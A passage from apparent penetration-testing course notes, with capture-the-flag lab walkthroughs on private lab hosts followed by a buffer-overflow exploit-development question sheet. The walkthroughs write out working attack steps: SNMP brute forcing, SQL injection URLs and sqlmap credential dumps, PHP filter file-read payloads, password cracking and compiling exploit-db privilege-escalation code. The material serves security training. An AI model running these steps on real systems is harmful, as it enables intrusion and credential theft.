1056gcc -o boom2 exploit2.c
1057
1058./boom2
1059
1060id
1061-----------------------------------------------------------------------
1062
1063
1064
1065
1066---------------------------Type This-----------------------------------
1067sudo nmap -sV 172.31.2.181
1068-----------------------------------------------------------------------
1069PORT STATE SERVICE VERSION
107022/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
1071
1072
1073---------------------------Type This-----------------------------------
1074sudo nmap -sU -p69,161 172.31.2.181
1075-----------------------------------------------------------------------
1076PORT STATE SERVICE
107769/udp closed tftp
1078161/udp open snmp
1079
1080
1081---------------------------Type This-----------------------------------
1082sudo apt-get -y install onesixtyone snmp
1083
1084wget https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/wordlists-misc/wordlist-common-snmp-community-strings.txt
1085
1086onesixtyone -c wordlist-common-snmp-community-strings.txt 172.31.2.181
1087----------------------------------------------------------------------
1088Gives error "Community string too long". A little bit of google and I found this reference: https://github.com/trailofbits/onesixtyone/issues/1
1089
1090---------------------------Type This-----------------------------------
1091cat wordlist-common-snmp-community-strings.txt | grep -v TENmanUFactOryPOWER > snmp-community-strings.txt
1092
1093onesixtyone -c snmp-community-strings.txt 172.31.2.181
1094
1095snmpwalk -Os -c public -v 1 172.31.2.181
1096---------------------------------------------------------------------
1097
1098Username "eric" found in snmpwalk, and the string "There is a house in New Orleans they call it..."
1099
1100Google the sentence, and I find out that the whole sentence is “There is a house in New Orleans they call it the rising sun”.
1101
1102Try to SSH to the box using the credentials eric:therisingsun
1103
1104
1105---------------------------Type This-----------------------------------
1106ssh -l eric 172.31.2.181
1107 therisingsun
1108
1109id
1110cat /etc/issue
1111uname -a
1112cat /etc/*release
1113
1114---------------------------Type This-----------------------------------
1115cat >> exploit.c << out
1116
1117**************paste in the content from here *****************
1118https://www.exploit-db.com/raw/39166/
1119
1120
1121------ hit enter a few times ------
1122
1123------ then type 'out' ----- this closes the file handle...
1124
1125
1126
1127---------------------------Type This-----------------------------------
1128gcc -o boom exploit.c
1129
1130./boom
1131
1132id
1133
1134
1135......YEAH - do the happy dance!!!!
1136
1137
1138
1139How to go after 172.31.2.238
1140Reference: https://t0w3ntum.com/2017/01/07/baffle/
1141
1142
1143---------------------------------------------------------------
1144sudo nmap -sV -p 3260 172.31.2.217
1145
1146
1147sudo apt install open-iscsi
1148
1149sudo iscsiadm -m discovery -t st -p 172.31.2.217
1150
1151sudo iscsiadm -m discovery -t st -p 172.31.2.217:3260
1152
1153sudo iscsiadm -m node -p 172.31.2.217 --login
1154
1155sudo /bin/bash
1156
1157fdisk -l
1158 ***** look for /dev/sda5 - Linux swap / Solaris *******
1159
1160mkdir /mnt/217vm
1161
1162mount /dev/sdb /mnt/217vm
1163
1164cd /mnt/217vm
1165
1166ls
1167
1168cat flag1.txt
1169
1170file bobsdisk.dsk
1171
1172mkdir /media/bobsdisk
1173
1174mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
1175
1176/mnt/217vm# ls
1177
1178cd /media/bobsdisk/
1179
1180ls
1181
1182cat ToAlice.eml
1183
1184file bobsdisk.dsk
1185
1186mkdir /media/bobsdisk
1187
1188mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
1189
1190/mnt/217vm# ls
1191
1192cd /media/bobsdisk/
1193
1194ls
1195
1196cat ToAlice.eml
1197
1198file ToAlice.csv.enc
1199
1200file bobsdisk.dsk
1201
1202pwd
1203
1204mkdir /media/bobsdisk
1205
1206
1207mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
1208
1209ls
1210
1211cd /media/bobsdisk/
1212
1213ls
1214
1215openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
1216
1217ls
1218
1219cat ToAlice.eml | grep flag
1220
1221openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
1222
1223ls
1224
1225cat ToAlice.eml
1226 ***** look for supercalifragilisticoespialidoso ******
1227
1228openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
1229
1230 supercalifragilisticoespialidoso
1231
1232
1233ls
1234
1235cat ToAlice.csv
1236
1237-----------------------------------------------------
1238Web Path,Reason
12395560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!
1240c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
1241flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?
1242
1243-----------------------------------------------------
1244
1245The hints are "Web Path" and "strangest URL" so let's try the long strings in the URL:
1246http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/
1247 -- view source
1248
1249Found this string in the source:
1250R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr
1251ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl
1252bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi
1253YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK
1254ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56
1255YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg
1256TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l
1257IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh
1258ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl
1259IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK
1260
1261------ https://www.base64decode.org/ -------
1262------ Decoded, but didn't find a flag -----
1263
1264
1265http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/
1266 -- view source --
1267 -- Nothing in source --
1268
1269Browsed to the flag link:
1270view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag
1271 -- view source --
1272 -- Nothing in source --
1273
1274
1275Tried a PHP base64 decode with the URL:
1276http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php
1277http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
1278http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php
1279
1280------ https://www.base64decode.org/ -------
1281Use the string found here:
1282http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
1283
1284-------------------------------------------------------------------
1285PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==
1286-------------------------------------------------------------------
1287<?php
1288defined ('VIAINDEX') or die('Ooooh! So close..');
1289?>
1290<h1>Flag</h1>
1291<p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
1292<img src="trollface.png" />
1293<?php
1294// Ok, ok. Here's your flag!
1295//
1296// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
1297//
1298// Well done, you're doing great so far!
1299// Next step. SHELL!
1300//
1301//
1302// Oh. That flag above? You're gonna need it...
1303?>
1304
1305
1306
1307
1308
1309============================================ Attacking another server because I need a reverse shell =========================================
1310---------------------------------------------------------------------------------------------------------------------------------------------------------
1311
1312Attack steps:
1313-------------
1314
1315
1316
1317Step 1: Ping sweep the target network
1318-------------------------------------
1319
1320
1321---------------------------Type This-----------------------------------
1322nmap -sP 172.31.2.0/24
1323-----------------------------------------------------------------------
1324
1325
1326
1327- Found 3 hosts
1328172.31.2.64
1329172.31.2.217
1330172.31.2.238
1331
1332
1333
1334Step 2: Port scan target system
1335-------------------------------
1336
1337
1338---------------------------Type This-----------------------------------
1339nmap -sV 172.31.2.64
1340-----------------------------------------------------------------------
1341
1342
1343
1344-------------Scan Results--------------------------------------------
1345PORT STATE SERVICE VERSION
134622/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
134780/tcp open http Apache httpd 2.4.7 ((Ubuntu))
1348514/tcp filtered shell
13491037/tcp filtered ams
13506667/tcp open irc ngircd
1351Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
1352--------------------------------------------------------------------
1353
1354
1355Step 3: Vulnerability Scan the webserver
1356----------------------------------------
1357
1358
1359---------------------------Type This-----------------------------------
1360cd ~/toolz/
1361
1362rm -rf nikto*
1363
1364git clone https://github.com/sullo/nikto.git Nikto2
1365
1366cd Nikto2/program
1367
1368perl nikto.pl -h 172.31.2.64
1369-----------------------------------------------------------------------
1370
1371
1372Step 4: Run dirbuster or similar directory bruteforce tool against the target
1373-----------------------------------------------------------------------------
1374
1375
1376---------------------------Type This-----------------------------------
1377wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
1378
1379perl Webr00t.pl -h 172.31.2.64 -v
1380-----------------------------------------------------------------------
1381 or with dirbuster (dirb)
1382
1383---------------------------Type This-----------------------------------
1384git clone https://github.com/v0re/dirb.git
1385
1386cd dirb/
1387
1388./configure
1389
1390make
1391
1392dirb
1393
1394./dirb http://172.31.2.64 wordlists/big.txt
1395-----------------------------------------------------------------------
1396
1397
1398
1399Step 5: Browse the web site to look for clues
1400---------------------------------------------
1401Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
1402
1403
1404..... really didn't get much from here so we just opened the web page in a browser
1405http://172.31.2.64/
1406
1407.....browsed to the webpage and saw that it pointed to:
1408http://172.31.2.64/jabc
1409
1410....clicked on documentation link and found hidden text that pointed to here:
1411http://172.31.2.64/jabcd0cs/
1412
1413....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
1414https://www.exploit-db.com/exploits/32075/
1415
1416Tried the sql injection described in exploit-db:
1417http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9
1418
1419http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9
1420
1421
1422
1423Tried to run sqlmap against the target
1424
1425
1426---------------------------Type This-----------------------------------
1427cd sqlmap-dev/
1428python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql
1429
1430python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql
1431
1432python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql
1433
1434python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql
1435
1436python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
1437-----------------------------------------------------------------------
1438
1439
1440
1441FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
1442FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net
1443
1444
1445
1446---------------------------Type This-----------------------------------
1447python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql
1448
1449python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
1450-----------------------------------------------------------------------
1451
1452 username: webmin
1453 hash: b78aae356709f8c31118ea613980954b
1454
1455https://hashkiller.co.uk/md5-decrypter.aspx
1456
1457 hash: b78aae356709f8c31118ea613980954b
1458 pass: webmin1980
1459
1460
1461ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.
1462
1463
1464
1465---------------------------Type This-----------------------------------
1466ssh -l webmin 172.31.2.64
1467 webmin1980
1468
1469id
1470
1471cat /etc/*release
1472-----------------------------------------------------------------------
1473
1474
1475
1476....tired of not having a real command shell...
1477
1478
1479---------------------------Type This-----------------------------------
1480python -c 'import pty;pty.spawn("/bin/bash")'
1481
1482
1483cd /tmp
1484
1485pwd
1486
1487
1488cat >> exploit.c << out
1489
1490**************paste in the content from here *****************
1491https://www.exploit-db.com/raw/39166/
1492
1493
1494------ hit enter a few times ------
1495
1496------ then type 'out' ----- this closes the file handle...
1497
1498
1499
1500---------------------------Type This-----------------------------------
1501gcc -o boom exploit.c
1502
1503./boom
1504-----------------------------------------------------------------------
1505
1506
1507------------exploit failed, damn let's try another one ---------
1508
1509
1510
1511---------------------------Type This-----------------------------------
1512cat >> exploit2.c << out
1513
1514**************paste in the content from here *****************
1515https://www.exploit-db.com/raw/37292/
1516
1517
1518out
1519
1520
1521gcc -o boom2 exploit2.c
1522
1523./boom2
1524
1525id
1526
1527
1528......YEAH - do the happy dance!!!!
1529=============================================== Now back to the previous server ==============================================================
1530
1531
1532
1533
1534 #######################################
1535----------- ############### # Day 3: Intro to Exploit Development ################ -----------
1536 #######################################
1537
1538The first exploit
1539https://s3.amazonaws.com/infosecaddictsfiles/SLmail5-5-Exploit.zip
1540
1541SLMail Scripts Questions
1542
1543SLmail1.py
1544How do you start SLMail?
1545What do you have to be careful of when attaching your debugger to the application?
1546How many As are you sending to the application?
1547
1548SLmail2.py
1549What tool(s) can be used to generate a cyclic pattern?
1550What port are we attacking?
1551What verb are we attacking?
1552
1553SLmail3.py
1554What is the value contained in EIP?
1555What is the portion of the cyclic pattern that we must search for?
1556What is the distance to EIP?
1557
1558SLmail4.py
1559What do you overwrite EIP with in this script?
1560What is the length of your shellcode in this script?
1561What is the difference between SOCK_STREAM and SOCK_DGRAM?
1562
1563SLmail5.py
1564What is struct.pack and why are we using it?
1565What where is our JMP ESP coming from?
1566What is the length of our shellcode in this script?
1567
1568SLmail6.py
1569Why do you subtract the top of ESP from the bottom of ESP in this script?
1570What is the length of our shellcode in this script?
1571What is the distance to EIP in this script?
1572
1573
1574SLmail7.py
1575How do you test for bad characters?
1576What are the bad characters in this script?
1577What is the address of the JMP ESP in this script and what DLL does it come from?
1578
1579
1580SLmail8.py
1581What is DEP and how do you disable it?
1582What is the purpose of the stack adjustment?
1583What is the purpose of the NOP sled?
1584
1585
1586If you got through SLMail comfortably - then try the script below.
1587https://s3.amazonaws.com/infosecaddictsfiles/ff.zip
1588
1589
1590Analysis of the exploit code:
1591https://www.exploit-db.com/exploits/15689/
1592What is the target platform that this exploit works against?
1593What is the variable name for the distance to EIP?
1594What is the actual distance to EIP in bytes?
1595Describe what is happening in the variable ‘junk2’?
1596
1597Analysis of the training walk-through based on EID: 15689:
1598https://s3.amazonaws.com/infosecaddictsfiles/ff.zip
1599
1600ff1.py
1601What does the sys module do?
1602What is sys.argv[1] and sys.argv[2]?
1603What application entry point is being attacked in this script?
1604
1605ff2.py
1606Explain what is happening in lines 18 - 20
1607What is pattern_create.rb doing and where can I find it?
1608Why can’t I just double click the file to run this script?
1609
1610ff3.py
1611Explain what is happening in lines 17 - to 25?
1612Explain what is happening in lines 30 - to 32?
1613Why is everything below line 35 commented out?
1614
1615ff4.py
1616Explain what is happening in lines 13 - to 15.
1617Explain what is happening in line 19.
1618Why is everything below line 35 commented out?
1619
1620Ff5.py
1621Explain what is happening in line 15.
1622What is struct.pack?.
1623How big is the shellcode in this script?
1624
1625ff6.py
1626What is the distance to EIP?
1627How big is the shellcode in this script?
1628What is the total byte length of the data being sent to this app?
1629
1630ff7.py
1631What is a tuple in python? Unchangeable list
1632How big is the shellcode in this script? 1000 Bytes
1633Did your app crash in from this script? No
1634
1635ff8.py
1636How big is the shellcode in this script?
1637What is try/except in python?
1638What is socket.SOCK_STREAM in Python?
1639
1640ff9.py
1641What is going on in lines 19 and 20?
1642What is the length of the NOPs?
1643What is socket.SOCK_STREAM in Python?
1644
1645ff010.py
1646What is going on in lines 18 - 20?
1647How would a stack adjustment help this script?